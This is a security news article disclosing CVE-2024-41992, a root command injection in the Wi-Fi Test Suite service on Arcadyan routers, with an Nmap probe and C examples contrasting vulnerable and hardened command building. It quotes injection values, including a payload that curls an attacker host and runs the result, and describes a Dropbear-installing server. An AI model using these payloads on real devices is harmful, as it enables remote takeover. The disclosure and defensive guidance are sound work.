Zero-Day Vulnerability In Arcadyan WiFi Devices Allows RCE for Root Access – Exploit Released
A critical zero-day vulnerability has been identified in the Arcadyan FMIMG51AX000J model and potentially other devices that ship the Wi-Fi Alliance's Wi-Fi Test Suite in production firmware. The flaw allows unauthenticated remote attackers to execute arbitrary commands on the device as root.
An independent security researcher working with SSD Secure Disclosure identified the vulnerability, tracked as CVE-2024-41992.
Despite reaching out to the WiFi Alliance via CERT VINCE in April 2024 (Case VU#123336), there has been no clear timeline for a fix.
Consequently, the researchers have decided to publicly disclose the issue to alert users, even though a solution is not yet available.
“We reached out to WiFi Alliance via CERT VINCE (Case VU#123336) in April 2024, several months later, and with no clear schedule for the release of a fix (by the vendor or by WiFi Alliance) we have decided to release this advisory to notify the public of this vulnerability without being able to provide a fix,” the SSD Secure Disclosure team said.
Technical Details
While conducting a network scan with Nmap on a router, researchers identified that ports 8000 and 8080 were open.
Although Nmap could not identify the service running on these ports, probing them by hand returned a banner containing “DUT-Wi-FiTestSuite”. The researchers captured the request and the response prefix as a custom Nmap service-probe entry:
##############################NEXT PROBE##############################
Probe TCP wfa_dut q|\x01\x00\x00\x00|
rarity 1
ports 8000,8080
match wfa_dut m|^\x01\x00\x08\x02\x04\x00\x00\x00\x00\x00\x00\x00DUT-Wi-FiTestSuite-|
This service is a test utility developed by the Wi-Fi Alliance for testing routers, and it’s not typically found on production devices.
The service listens for packets in a Type-Length-Value (TLV) format: a 2-byte type, a 2-byte length, and a value of 0 to 640 bytes. Both header fields are little-endian on the wire, as the probe above shows (type 1 with length 0 is sent as the bytes 01 00 00 00); a client that writes them big-endian will have its type and length misread by the device. Each type selects one of a table of handler functions, so these packets can call any of them.
For example, to get the version of the Wi-Fi Test Suite, you send a packet with the type value of ‘1’ and a length of ‘0’.
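As an added example (not code from the page or from the Wi-Fi Test Suite), the following encoder and decoder implement the TLV framing described above with the little-endian header the probe shows, reject lengths over 640 bytes or values that are truncated, and pull the version banner out of a reply laid out like the nmap match line. The function names, WFA_TLV_MAX_VALUE and the SAMPLE_REPLY bytes are assumptions; the eight bytes between the header and the banner are skipped, not interpreted, because the page does not say what they mean.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define WFA_TLV_HDR_LEN   4
#define WFA_TLV_MAX_VALUE 640   /* value size limit stated on the page (assumed as a hard cap) */
#define WFA_GET_VERSION   1     /* type 1 with length 0 asks for the version */

typedef struct {
    uint16_t type;
    uint16_t len;
    const uint8_t *value;       /* points into the caller's receive buffer */
} wfa_tlv_t;

/* Serialise one TLV into out with little-endian header fields.
 * Returns the number of bytes written, or 0 if it does not fit. */
size_t wfa_tlv_encode(uint16_t type, const uint8_t *value, uint16_t len,
                      uint8_t *out, size_t out_cap)
{
    if (len > WFA_TLV_MAX_VALUE || out_cap < WFA_TLV_HDR_LEN + (size_t)len)
        return 0;
    out[0] = (uint8_t)(type & 0xff);
    out[1] = (uint8_t)(type >> 8);
    out[2] = (uint8_t)(len & 0xff);
    out[3] = (uint8_t)(len >> 8);
    if (len)
        memcpy(out + WFA_TLV_HDR_LEN, value, len);
    return WFA_TLV_HDR_LEN + len;
}

/* Parse one TLV from buf. Returns 0 on success, -1 if the header is
 * truncated, the declared length exceeds 640, or the value is truncated.
 * This is the bounds check to apply before trusting a received length. */
int wfa_tlv_decode(const uint8_t *buf, size_t buf_len, wfa_tlv_t *out)
{
    if (buf_len < WFA_TLV_HDR_LEN)
        return -1;
    uint16_t type = (uint16_t)(buf[0] | (buf[1] << 8));
    uint16_t len  = (uint16_t)(buf[2] | (buf[3] << 8));
    if (len > WFA_TLV_MAX_VALUE || buf_len - WFA_TLV_HDR_LEN < len)
        return -1;
    out->type  = type;
    out->len   = len;
    out->value = buf + WFA_TLV_HDR_LEN;
    return 0;
}

/* Locate the version banner in a type-1 reply: skip the 8 bytes after the
 * header, as the nmap match line does, and require a NUL inside the value
 * so the returned pointer is a proper C string. Returns NULL otherwise. */
const char *wfa_version_banner(const wfa_tlv_t *t)
{
    if (t->type != WFA_GET_VERSION || t->len <= 8)
        return NULL;
    const uint8_t *s = t->value + 8;
    if (memchr(s, '\0', t->len - 8) == NULL)
        return NULL;
    return (const char *)s;
}

/* Constructed sample reply (not a capture): type 1, length 28, 8 skipped
 * bytes, then the banner string as it appears in the nmap signature. */
const uint8_t SAMPLE_REPLY[] = {
    0x01, 0x00, 0x1c, 0x00,
    0x04, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
    'D','U','T','-','W','i','-','F','i','T','e','s','t','S','u','i','t','e','-', 0
};

int main(void)
{
    uint8_t probe[WFA_TLV_HDR_LEN];
    size_t n = wfa_tlv_encode(WFA_GET_VERSION, NULL, 0, probe, sizeof probe);
    printf("version probe (%zu bytes):", n);
    for (size_t i = 0; i < n; i++)
        printf(" %02x", probe[i]);          /* the nmap probe bytes: 01 00 00 00 */
    putchar('\n');

    wfa_tlv_t reply;
    if (wfa_tlv_decode(SAMPLE_REPLY, sizeof SAMPLE_REPLY, &reply) == 0)
        printf("type %u len %u banner %s\n", reply.type, reply.len,
               wfa_version_banner(&reply));
    return 0;
}
```

The decoder is the defensive counterpart of the device's wfaDecodeTLV: it checks the declared length against both the 640-byte ceiling and the bytes actually received before handing out a pointer into the buffer, which is the check a handler must rely on before overlaying the value onto a parameter struct.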
The researcher then explored whether this service could be used to execute commands, and it can, albeit with limitations.
The function wfaDecodeTLV decodes the incoming packets, extracting the type, length, and value. Some handlers, like wfaStaGetIpConfig, use the parameters from these packets to build system commands: it formats a command using the first 16 bytes of the parameters and executes it.
The researcher found that injecting commands is possible, but with significant constraints: a short command can be injected by crafting a packet with a specific type and length. For example, a value of $(sleep 5) executes a sleep command. The command itself, however, is limited to 13 characters, because the parameter field is only 16 bytes and the $( ) wrapper consumes three of them.
While the service allows for command execution, the exploitability is limited by the short length of commands that can be injected.
This makes it challenging to perform more complex exploits, but it does highlight a potential security risk in environments where this service is exposed.
Exploitability
While character constraints limited initial attempts at command injection, the researchers found that using the wfaTGSendPing function allowed for more extensive exploitation.
// In wfa_tg.h
// #define IPV6_ADDRESS_STRING_LEN 40
typedef struct _tg_ping_start
{
    char  dipaddr[IPV6_ADDRESS_STRING_LEN]; /* destination/remote ip address */
    int   frameSize;
    float frameRate;
    int   duration;
    int   type;
    int   qos;
    int   iptype;
    int   dscp;
} tgPingStart_t;
The IPv6 address field, dipaddr, is 40 bytes rather than 16, and the handler pastes it unquoted into a shell command line, so an attacker can inject far longer commands and take control of the device:
/* excerpt from wfaTGSendPing: dipaddr is interpolated unquoted into cmdStr */
if (staPing->iptype == 2)
{
    if (tos > 0)
        sprintf(cmdStr, "echo streamid=%i > /tmp/spout_%d.txt;wfaping6.sh %s %s -i %f -c %i -Q %d -s %i -q >> /tmp/spout_%d.txt 2>/dev/null",
                streamid, streamid, bflag, staPing->dipaddr, *interval, totalpkts, tos, staPing->frameSize, streamid);
    else
        sprintf(cmdStr, "echo streamid=%i > /tmp/spout_%d.txt;wfaping6.sh %s %s -i %f -c %i -s %i -q >> /tmp/spout_%d.txt 2>/dev/null",
                streamid, streamid, bflag, staPing->dipaddr, *interval, totalpkts, staPing->frameSize, streamid);
    sret = system(cmdStr);
}
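As an added example (not code from the page or from the Wi-Fi Test Suite), the block below reduces the IPv6 branch above to its essential shape, shows how the TLV value lands on the tgPingStart_t struct and then inside a shell string, and places a hardened construction next to it: the destination must parse as an IPv6 literal with inet_pton, and the helper's arguments are built as an argv vector for execvp or posix_spawnp rather than a string for system(). The page's injection value is reused as constructed input; ping_from_tlv_value, build_ping_cmd_vulnerable, build_ping_argv and ping_argv_t are hypothetical names, and bflag is left empty.

```c
#include <arpa/inet.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define IPV6_ADDRESS_STRING_LEN 40   /* from wfa_tg.h, as quoted above */

typedef struct _tg_ping_start {
    char  dipaddr[IPV6_ADDRESS_STRING_LEN];
    int   frameSize;
    float frameRate;
    int   duration;
    int   type;
    int   qos;
    int   iptype;
    int   dscp;
} tgPingStart_t;

/* The handler treats the TLV value as a tgPingStart_t. Zero the struct
 * first and force a terminator so a 40-byte dipaddr cannot run past the
 * field when it is later printed with %s. (Hypothetical helper.) */
void ping_from_tlv_value(const uint8_t *value, size_t len, tgPingStart_t *out)
{
    memset(out, 0, sizeof *out);
    if (len > sizeof *out)
        len = sizeof *out;
    memcpy(out, value, len);
    out->dipaddr[IPV6_ADDRESS_STRING_LEN - 1] = '\0';
}

/* Vulnerable shape, as in the page's IPv6 branch (tos == 0 case, bflag
 * empty): dipaddr is pasted into a shell command line, so a value such as
 * $(...) is executed by the shell that system() starts. The string is only
 * built here, not run, so it can be inspected. Returns snprintf's length. */
int build_ping_cmd_vulnerable(const tgPingStart_t *staPing, int streamid,
                              float interval, int totalpkts,
                              char *cmdStr, size_t cap)
{
    const char *bflag = "";
    return snprintf(cmdStr, cap,
        "echo streamid=%i > /tmp/spout_%d.txt;wfaping6.sh %s %s -i %f -c %i "
        "-s %i -q >> /tmp/spout_%d.txt 2>/dev/null",
        streamid, streamid, bflag, staPing->dipaddr, interval, totalpkts,
        staPing->frameSize, streamid);
}

/* Hardened shape: accept only a parseable IPv6 literal, then hand the
 * helper its arguments as an argv vector (for execvp/posix_spawnp) instead
 * of a shell string. Every injection character fails inet_pton, so no
 * shell quoting has to be reasoned about. argv[1] points at the caller's
 * struct, which must outlive the vector. Returns argc, or -1 on rejection. */
typedef struct {
    char        count[16];
    char        size[16];
    const char *argv[8];
} ping_argv_t;

int build_ping_argv(const tgPingStart_t *staPing, int totalpkts, ping_argv_t *out)
{
    struct in6_addr a6;
    if (inet_pton(AF_INET6, staPing->dipaddr, &a6) != 1)
        return -1;
    if (totalpkts <= 0 || staPing->frameSize <= 0)
        return -1;
    snprintf(out->count, sizeof out->count, "%d", totalpkts);
    snprintf(out->size,  sizeof out->size,  "%d", staPing->frameSize);
    const char *argv[8] = { "wfaping6.sh", staPing->dipaddr, "-c", out->count,
                            "-s", out->size, "-q", NULL };
    memcpy(out->argv, argv, sizeof argv);
    return 7;
}

int main(void)
{
    /* constructed input: the injection value quoted on the page */
    const char inj[] = "$(sh -c \"$(curl 192.168.1.247:4)\")";
    tgPingStart_t p;
    char cmd[512];
    ping_argv_t pa;

    ping_from_tlv_value((const uint8_t *)inj, sizeof inj - 1, &p);
    build_ping_cmd_vulnerable(&p, 1, 1.0f, 3, cmd, sizeof cmd);
    printf("shell would see: %s\n", cmd);
    printf("hardened builder: %s\n",
           build_ping_argv(&p, 3, &pa) < 0 ? "rejected" : "accepted");
    return 0;
}
```

The point of the argv form is that the destination never passes through a shell at all; inet_pton is the allow-list, and a 40-byte field that holds only hex digits, colons and dots has no room for a command substitution.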
This gives the researchers far broader exploitation possibilities, because the injected command can call binaries already present on the target, such as sh and curl.
A single packet is enough to execute remote commands. Its structure is: Type 2 (0x02), Length 33 (0x21), and a Value that is the command '$(sh -c "$(curl 192.168.1.247:4)")'.
In parallel, a Python server on the attacker's machine serves several components: a bash script that downloads and configures Dropbear, the Dropbear binary, and the dropbearkey binary.
Additionally, the server prints POST requests to the console for debugging. This setup yields full root access to the system; the researchers have published a complete exploit.
This vulnerability underscores the importance of robust security measures in IoT and network devices. Users of the affected models are advised to monitor for firmware updates and apply patches as soon as they become available. In the meantime, block access to TCP ports 8000 and 8080 on these devices from untrusted networks, treat a “DUT-Wi-FiTestSuite” banner on either port as confirmation that the test service is exposed, and watch for unexpected outbound downloads or new SSH listeners on the router.